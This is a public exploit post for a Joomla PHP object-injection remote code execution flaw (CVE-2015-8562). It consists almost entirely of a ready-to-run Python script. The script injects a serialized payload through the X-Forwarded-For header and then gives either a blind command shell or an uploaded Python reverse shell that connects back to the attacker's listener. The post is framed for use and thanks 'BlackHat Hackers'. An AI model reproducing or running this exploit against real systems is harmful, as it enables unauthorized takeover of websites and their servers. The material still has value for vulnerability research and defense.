[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
[!] Exploit Title : Joomla Object Injection RCE Vulnerability
[!] Exploit Author : 4TT4CK3R
[!] Date : 2015/12/20
[!] Version : 1.5 - 3.4
[!] Category : WebApplication
[!] Google Dork : No
[!] Tested on : Kali linux , Windows 8.1 , Mozilla FireFox
[!] HomePage Address : http://joomla.org
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
[!]
[!] Save This Script Source with python format (.py) and then run it :
#!/usr/bin/env python
import requests
import subprocess
import argparse
import sys
import base64
def get_url(url, user_agent):
headers = {
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
'x-forwarded-for': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
def main():
parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
args = parser.parse_args()
if args.cmd:
print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
print "[-] Dropping into shell-like environment to perform blind RCE"
while True:
command = raw_input('$ ')
cmd_str = "system('{}');".format(command)
pl = generate_payload(cmd_str)
print get_url(args.RHOST, pl)
elif args.LPORT and args.LPORT:
connection = "'{}', {}".format(args.LHOST, args.LPORT)
shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
encoded_comm = base64.b64encode(shell_str)
payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
pl = generate_payload("system('"+payload+"');")
print get_url(args.RHOST, pl)
listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
print "[+] Spawning reverse shell...."
pl = generate_payload("system('python /tmp/newhnewh.py');")
print get_url(args.RHOST, pl)
else:
print '[!] missing arguments'
parser.print_help()
if __name__ == "__main__":
main()
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
[!] Discovered by : 4TT4CK3R
[!] Special Thanks for : BlackHat Hackers
[!] J U S T F O R C Y B E R P O L I C E
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
